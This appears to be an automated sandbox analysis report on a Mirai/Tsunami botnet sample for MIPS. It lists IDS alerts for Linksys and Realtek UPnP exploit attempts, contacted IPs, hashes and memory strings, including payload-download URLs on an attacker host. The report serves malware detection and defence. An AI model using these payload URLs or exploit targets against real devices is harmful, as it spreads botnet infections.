Source: unknown	Network traffic detected: HTTP traffic on port 43240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51800 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40424 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58624 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38008 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41194 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51528 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58974 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44912 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40938 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37736 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42406 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34844 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43594 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34050 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48136 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58084 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57852 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58770 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42068 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58770 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57852 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58770 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57852 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57852 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58770 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38544 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34032 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37184 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53338 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43230 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48800 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34032 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41980 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34032 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50494 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34032 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42248 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41612 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34032 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39452 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41716 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54126 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33602 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48644 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60900 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48644 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48644 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48644 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49030 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41312 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55554 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34032 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 55555

Source: /tmp/NE8O7liu0s (PID: 6225)

Queries kernel information via 'uname':

Source: NE8O7liu0s, 6225.1.0000000031a641f0.00000000839149f1.rw-.sdmp, NE8O7liu0s, 6229.1.0000000031a641f0.00000000839149f1.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/NE8O7liu0sSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/NE8O7liu0s
Source: NE8O7liu0s, 6225.1.000000006609cba7.00000000e976ddd3.rw-.sdmp, NE8O7liu0s, 6229.1.000000006609cba7.00000000e976ddd3.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: NE8O7liu0s, 6225.1.000000006609cba7.00000000e976ddd3.rw-.sdmp, NE8O7liu0s, 6229.1.000000006609cba7.00000000e976ddd3.rw-.sdmp	Binary or memory string: sU!/etc/qemu-binfmt/mipsel
Source: NE8O7liu0s, 6225.1.0000000031a641f0.00000000839149f1.rw-.sdmp, NE8O7liu0s, 6229.1.0000000031a641f0.00000000839149f1.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Obfuscated Files or Information	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Service Stop
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 File Deletion	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	3 Ingress Tool Transfer	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NE8O7liu0s	28%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://127.0.0.1:80/tmUnblock.cgi	0%	Virustotal		Browse
http://127.0.0.1:80/tmUnblock.cgi	0%	Avira URL Cloud	safe
http://103.136.43.52/bin	0%	Avira URL Cloud	safe
http://103.136.43.52/zyxel.sh;	0%	Avira URL Cloud	safe
http://103.136.43.52/bins/Tsunami.mips;	0%	Avira URL Cloud	safe
http://103.136.43.52/bins/Tsunami.x86	0%	Avira URL Cloud	safe
http://192.168.0.14:80/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:80/tmUnblock.cgi	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://192.168.0.14:80/cgi-bin/ViewLog.asp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding//%22%3E	NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false		high
http://upx.sf.net	NE8O7liu0s	false		high
http://103.136.43.52/bin	NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope//	NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false		high
http://103.136.43.52/zyxel.sh;	NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://103.136.43.52/bins/Tsunami.mips;	NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://103.136.43.52/bins/Tsunami.x86	NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
156.139.26.110	unknown	United States	3356	LEVEL3US	false
85.71.136.30	unknown	Czech Republic	5610	O2-CZECH-REPUBLICCZ	false
85.25.248.125	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
85.18.200.236	unknown	Italy	12874	FASTWEBIT	false
85.21.46.64	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
157.214.20.165	unknown	United States	4704	SANNETRakutenMobileIncJP	false
94.250.37.203	unknown	Bosnia and Herzegowina	25144	TELEKOM-SRPSKE-ASKraljaPetraIKaradjordjevica61aBA	false
172.55.124.7	unknown	United States	21928	T-MOBILE-AS21928US	false
184.77.151.6	unknown	United States	16509	AMAZON-02US	false
98.27.141.240	unknown	United States	10796	TWC-10796-MIDWESTUS	false
98.206.117.102	unknown	United States	7922	COMCAST-7922US	false
184.43.77.0	unknown	United States	5778	CENTURYLINK-LEGACY-EMBARQ-RCMTUS	false
42.117.139.131	unknown	Viet Nam	18403	FPT-AS-APTheCorporationforFinancingPromotingTechnolo	false
172.72.181.240	unknown	United States	11426	TWC-11426-CAROLINASUS	false
31.179.180.12	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
212.157.35.227	unknown	France	702	UUNETUS	false
79.12.221.153	unknown	Italy	3269	ASN-IBSNAZIT	false
62.187.196.200	unknown	European Union	34456	RIALCOM-ASRU	false
79.169.109.126	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
62.145.208.26	unknown	Netherlands	33915	TNF-ASNL	false
62.118.118.92	unknown	Russian Federation	8359	MTSRU	false
88.243.145.6	unknown	Turkey	9121	TTNETTR	false
156.223.192.114	unknown	Egypt	8452	TE-ASTE-ASEG	false
62.152.157.231	unknown	Poland	1902	PAN-NETDeutscheTelekomPan-NetsroSK	false
62.219.245.8	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	false
85.182.60.117	unknown	Germany	6805	TDDE-ASN1DE	false
172.12.143.81	unknown	United States	7018	ATT-INTERNET4US	false
94.128.103.33	unknown	Kuwait	47589	KTC3GKW	false
31.196.12.210	unknown	Italy	3269	ASN-IBSNAZIT	false
212.13.196.8	unknown	United Kingdom	8943	JUMPGB	false
31.118.153.247	unknown	United Kingdom	12576	EELtdGB	false
41.116.238.229	unknown	South Africa	16637	MTNNS-ASZA	false
41.214.230.3	unknown	Morocco	36925	ASMediMA	false
94.69.81.96	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
184.237.135.2	unknown	United States	10507	SPCSUS	false
184.37.225.200	unknown	United States	5778	CENTURYLINK-LEGACY-EMBARQ-RCMTUS	false
94.153.184.212	unknown	Ukraine	15895	KSNET-ASUA	false
94.114.237.26	unknown	Germany	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
31.134.158.117	unknown	Russian Federation	42668	NEVALINK-ASRU	false
31.230.126.168	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
156.223.192.121	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.172.168.202	unknown	South Africa	36937	Neotel-ASZA	false
184.37.225.208	unknown	United States	5778	CENTURYLINK-LEGACY-EMBARQ-RCMTUS	false
31.233.207.174	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
62.122.49.242	unknown	Russian Federation	47530	NVTC-ASRU	false
172.65.108.217	unknown	United States	13335	CLOUDFLARENETUS	false
178.195.108.155	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
184.62.170.5	unknown	United States	7155	VIASAT-SP-BACKBONEUS	false
95.121.137.208	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
94.250.142.185	unknown	Croatia (LOCAL Name: Hrvatska)	12810	VIPNET-AS3GGSMandInternetServiceProviderHR	false
41.114.147.165	unknown	South Africa	16637	MTNNS-ASZA	false
184.13.229.62	unknown	United States	7011	FRONTIER-AND-CITIZENSUS	false
172.115.197.166	unknown	United States	20001	TWC-20001-PACWESTUS	false
184.158.254.154	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
62.80.165.193	unknown	Ukraine	25386	INTERTELECOM-ASUA	false
85.136.26.144	unknown	Spain	12357	COMUNITELSPAINES	false
172.87.78.101	unknown	United States	393951	HORTONS-TVUS	false
95.252.144.239	unknown	Italy	3269	ASN-IBSNAZIT	false
212.76.212.201	unknown	Germany	12571	INCAS-ASKrefeldGermanyDE	false
94.22.197.197	unknown	Finland	15527	ANVIASilmukkatie6VaasaFinlandFI	false
172.72.181.219	unknown	United States	11426	TWC-11426-CAROLINASUS	false
31.212.88.218	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
31.253.231.71	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
197.232.116.123	unknown	Kenya	36866	JTLKE	false
212.188.118.230	unknown	Russian Federation	49154	MTS-DOM-ASRU	false
98.153.132.43	unknown	United States	20001	TWC-20001-PACWESTUS	false
95.81.253.240	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
62.23.59.142	unknown	United Kingdom	8220	COLTCOLTTechnologyServicesGroupLimitedGB	false
184.179.195.6	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
62.105.89.80	unknown	United Kingdom	5413	AS5413GB	false
31.146.6.154	unknown	Georgia	35805	SILKNET-ASGE	false
94.9.108.45	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
85.90.55.64	unknown	United Kingdom	39116	TELEHOUSEGB	false
95.55.190.176	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
184.63.30.65	unknown	United States	7155	VIASAT-SP-BACKBONEUS	false
94.54.78.135	unknown	Turkey	47524	TURKSAT-ASTR	false
95.166.18.160	unknown	Denmark	3292	TDCTDCASDK	false
37.58.70.142	unknown	Netherlands	36351	SOFTLAYERUS	false
184.236.201.56	unknown	United States	10507	SPCSUS	false
118.28.71.41	unknown	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	false
85.136.26.133	unknown	Spain	12357	COMUNITELSPAINES	false
210.55.200.54	unknown	New Zealand	4648	SPARK-NZGlobal-GatewayInternetNZ	false
5.205.27.174	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
42.200.120.220	unknown	Hong Kong	4760	HKTIMS-APHKTLimitedHK	false
157.249.142.116	unknown	Norway	224	UNINETTUNINETTTheNorwegianUniversityResearchNetwork	false
184.73.107.159	unknown	United States	14618	AMAZON-AESUS	false
31.121.171.220	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
98.105.141.154	unknown	United States	6167	CELLCO-PARTUS	false
95.53.226.227	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
184.89.14.254	unknown	United States	33363	BHN-33363US	false
41.216.159.6	unknown	Burkina Faso	37073	IPP-burkina-asBF	false
156.249.231.186	unknown	Seychelles	26484	IKGUL-26484US	false
41.5.41.221	unknown	South Africa	29975	VODACOM-ZA	false
184.172.50.13	unknown	United States	36351	SOFTLAYERUS	false
157.186.91.142	unknown	Russian Federation	22192	SSHENETUS	false
85.226.77.39	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
109.114.39.34	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
79.93.89.21	unknown	France	15557	LDCOMNETFR	false
85.126.133.246	unknown	Austria	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
31.163.227.21	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	7.92256083220724
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	NE8O7liu0s
File size:	36540
MD5:	2bbe3dc5b85619b7207ec547f6a78508
SHA1:	ef6be828cf9071e4514628bbea20d281d549e70c
SHA256:	598e89a664e3e67a264dc70c0c2328dc56359e05ad6061fc34d8c15770971ba5
SHA512:	ffcfac0ec66bdbed4986a2b56f7f7bdcb94660558182be6ed41a76a85bcb87edea10b98092e5d2263b10131ef725a9d5b30be1d05d118864df15a11505035f78
SSDEEP:	768:QzbT6ykD0dgr/v11BbBLmFRlf3XGo4cWuwNE/WO:QzSykDpr/v1bJmp2C
TLSH:	FEF2E0DFB2903B98C93D1C79158E2F692D50A2DC32DE0768E7065CCCFA0A55BF2081B6
File Content Preview:	.ELF....................Pz..4...........4. ...(.........................................T...T.C.T.C....................xUPX!d.......D...D.......V..........?.E.h;....#......b.L#32..z..NXk.....u...*.);.............,E..B.......@S...9...u...<.....v.........p?

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x107a50
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x100000	0x100000	0x8d8d	0x8d8d	4.1753	0x5	R E	0x10000
LOAD	0x1f54	0x431f54	0x431f54	0x0	0x0	0.0000	0x6	RW	0x10000

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.23172.65.188.5044500555552027153 05/14/22-02:15:56.359731	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44500	55555	192.168.2.23	172.65.188.50
192.168.2.2388.193.152.18034398802027121 05/14/22-02:15:59.312151	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34398	80	192.168.2.23	88.193.152.180
192.168.2.2388.198.26.3738100802027121 05/14/22-02:15:44.516920	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38100	80	192.168.2.23	88.198.26.37
192.168.2.23156.250.122.2554380528692027339 05/14/22-02:15:57.938396	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	54380	52869	192.168.2.23	156.250.122.25
192.168.2.23172.65.169.9544990555552027153 05/14/22-02:16:03.335900	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44990	55555	192.168.2.23	172.65.169.95
192.168.2.2388.221.144.12941178802027121 05/14/22-02:15:49.661036	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41178	80	192.168.2.23	88.221.144.129
192.168.2.23172.65.67.15059474555552027153 05/14/22-02:15:56.352112	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	59474	55555	192.168.2.23	172.65.67.150
192.168.2.2388.90.176.23744584802027121 05/14/22-02:15:51.846554	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44584	80	192.168.2.23	88.90.176.237
192.168.2.2388.85.234.17050988802027121 05/14/22-02:15:55.583622	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50988	80	192.168.2.23	88.85.234.170
192.168.2.2388.163.115.23545742802027121 05/14/22-02:15:51.797913	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45742	80	192.168.2.23	88.163.115.235
192.168.2.23172.65.150.13942616555552027153 05/14/22-02:16:03.318542	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	42616	55555	192.168.2.23	172.65.150.139
192.168.2.23172.65.71.21054402555552027153 05/14/22-02:15:56.342447	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	54402	55555	192.168.2.23	172.65.71.210
192.168.2.23172.65.39.14960752555552027153 05/14/22-02:15:53.260356	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	60752	55555	192.168.2.23	172.65.39.149
192.168.2.2388.193.168.20742388802027121 05/14/22-02:15:49.632801	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	42388	80	192.168.2.23	88.193.168.207
192.168.2.23172.65.79.19236744555552027153 05/14/22-02:15:53.242553	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	36744	55555	192.168.2.23	172.65.79.192
192.168.2.23156.226.58.6036698528692027339 05/14/22-02:15:56.717589	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	36698	52869	192.168.2.23	156.226.58.60
192.168.2.23172.65.178.3742472555552027153 05/14/22-02:15:44.534691	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	42472	55555	192.168.2.23	172.65.178.37
192.168.2.23172.65.30.3943676555552027153 05/14/22-02:15:48.668722	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	43676	55555	192.168.2.23	172.65.30.39
192.168.2.23172.65.130.16035856555552027153 05/14/22-02:15:53.242653	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	35856	55555	192.168.2.23	172.65.130.160
192.168.2.23156.245.44.4350224528692027339 05/14/22-02:16:04.452185	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	50224	52869	192.168.2.23	156.245.44.43
192.168.2.2388.125.107.2537604802027121 05/14/22-02:15:51.892368	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	37604	80	192.168.2.23	88.125.107.25
192.168.2.23172.65.7.2655700555552027153 05/14/22-02:15:46.602305	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	55700	55555	192.168.2.23	172.65.7.26
192.168.2.23172.65.184.3435476555552027153 05/14/22-02:15:48.685886	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	35476	55555	192.168.2.23	172.65.184.34
192.168.2.2388.148.69.6734326802027121 05/14/22-02:16:01.433501	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34326	80	192.168.2.23	88.148.69.67
